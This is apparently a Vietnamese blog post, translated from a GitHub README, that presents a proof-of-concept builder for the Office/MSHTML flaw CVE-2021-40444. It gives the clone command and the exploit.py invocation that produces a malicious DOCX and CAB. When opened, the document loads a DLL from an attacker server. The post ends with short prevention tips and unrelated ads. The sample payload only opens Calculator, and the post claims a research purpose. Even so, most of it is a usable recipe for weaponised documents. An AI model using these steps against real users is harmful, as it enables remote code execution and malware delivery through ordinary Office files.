PoC CVE-2021-40444 – Đính kèm Virus vào File Word

CVE-2021-40444 là mã lỗ hổng bảo mật mới nhất được sử dụng để tấn công Windows bằng file Word, Excel, PowerPoint. Tính đến thời điểm này, Microsoft chưa có bản vá cho Windows và chúng ta cần phải chờ đến bản vá lỗi định kỳ vào thứ 3 tuần tới. Tuy nhiên Defender vẫn có thể nhận diện được mã độc được đính kèm. HIện nay đã có Tool PoC CVE-2021-40444 giúp bạn thực nghiệm việc đính virus vào file văn bản gồm các sản phẩm của Microsoft nha CVE-2021-40444. Bài viết này chủ yếu dịch theo bài gốc của github vào mục đích nghiên cứu, vui lòng không lợi dụng để vi phạm pháp luật.

PoC CVE-2021-40444 là gì?

Mã CVE-2021-40444 không phải là một lỗ hổng Office hoàn toàn, vì việc khai thác tận dụng MSHTML web renderer (Internet Explorer) ActiveX control. Tuy không phải là một trình duyệt hoàn chỉnh nhưng nó là một “web engine” cốt lõi của Internet Explorer và có thể được sử dụng riêng để tạo các phiên trình duyệt hoặc ứng dụng giống như trình duyệt cần hoặc muốn hiển thị các tệp HTML.

Chính vì vậy, để khai thác CVE-2021-40444, kẻ tấn công chỉ cần DOCX, RTF hoặc bất kỳ tệp nào khác có thể trỏ đến OLE objects từ xa. Hiện vẫn chưa thấy có dấu hiệu khai thác lỗ hỏng nguy hiểm này từ các tin tặc ngoài việc chỉ thông qua Microsoft Office

Phần mềm tạo file docx độc hại để khai thác mã lỗi CVE-2021-40444 (Thực thi mã từ xa Microsoft Office Word).

Việc tạo Tập lệnh này dựa trên một số kỹ thuật đảo ngược đối với mẫu được sử dụng trong tự nhiên: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (tệp docx)

Bạn cần cài đặt lcab trước ( sudo apt-get install lcab)

Nếu file cab đã tạo của bạn không hoạt động, hãy thử trỏ tới file URL trong explore.html tới calc.cab

Đính kèm mã độc vào file Word, Excel, PowerPoint

Công cụ này sẽ giúp bạn tạo ra một file Word độc hại, khi mở file , sẽ có một hàm trỏ tới test/calc.dll dùng để mở chương trình máy tính Calculator của Windows lên.

Trước tiên chúng ta cần tải PoC CVE-2021-40444

git clone https://github.com/anonyvietofficial/CVE-2021-40444.git

python3 exploit.py generate test/calc.dll http://<SRV IP>

download PoC CVE-2021-40444

File word được đính kèm mã độc sẽ nằm trong thư mục out, file cab độc hại nằm trong thư mục srv. Bây giờ bạn có thể thiết lập Server

PoC CVE-2021-40444 - Đính kèm Virus vào File Word 7

Thử mở file docx vừa được tạo trong máy ảo, chúng ta sẽ thấy File Word mở lên và chương trình máy tính Calculator cũng mở lên theo.

Làm sao ngăn chặn file Word độc hại CVE-2021-40444

Nếu bạn nhận file Word từ những nguồn đáng ngờ, trước tiên cần quét Virus từ các phần mềm chính hãng có bản quyền.

Nếu chỉ có nhu cầu đọc file, không có nhu cầu sửa file thì không nên bật chế độ Protected View “Enable Editing”.

Enable Editing

Nếu bạn cần sửa file, tốt nhất là upload file lên Google Drive, sau đó dùng tính năng của Google Tài liệu để chỉnh sửa.

Adblock test (Why?)


Xem Them Chi Tiet

Nhung Mon Do Cong Nghe Duoc Yeu Thich

Do Cong Nghe Phu Kien
Xem Them Chi Tiet

Phu nu phai dep dan ong moi yeu! Sam ngay bo vay dam sieu dep

Thanh xuan nhu mot tach trá Khong mua do hot phi hoai thanh xuan

0 nhận xét:

Đăng nhận xét